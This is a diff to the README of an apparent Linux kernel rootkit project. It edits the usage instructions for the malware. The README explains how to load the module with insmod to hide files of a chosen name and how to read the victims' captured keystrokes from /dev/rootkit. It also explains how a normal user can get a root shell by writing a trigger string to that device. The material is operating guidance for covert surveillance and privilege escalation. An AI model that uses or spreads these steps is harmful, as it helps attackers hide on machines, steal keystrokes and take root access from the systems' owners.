niv256/simple_rootkit/README.md

 ### How to hide a chosen file name:
-1. When inserting the module, pass the chosen pid as a parameter to the insmod function, like this:
+1. When inserting the module, pass the chosen file name as a parameter to the insmod function, like this:
-   `sudo insmod rookit.ko pid="foobar"`, to hide file with the name "foobar".
+   `sudo insmod rookit.ko pid=foobar`, to hide files with the name "foobar".

 ### How to read the user's keystrokes:
-1. Read from `/dev/rootkit` file, for example, with `sudo cat /dev/rootkit`.
+1. Read from `/dev/rootkit` file, for example, with `cat /dev/rootkit`.

 ### How to spawn a root shell as a normal user once the rootkit has loaded:
 1. Execute the get_root program (in get_root folder) or anything similar which write "please_give_me_root" to `/dev/rootkit` and spawns a shell.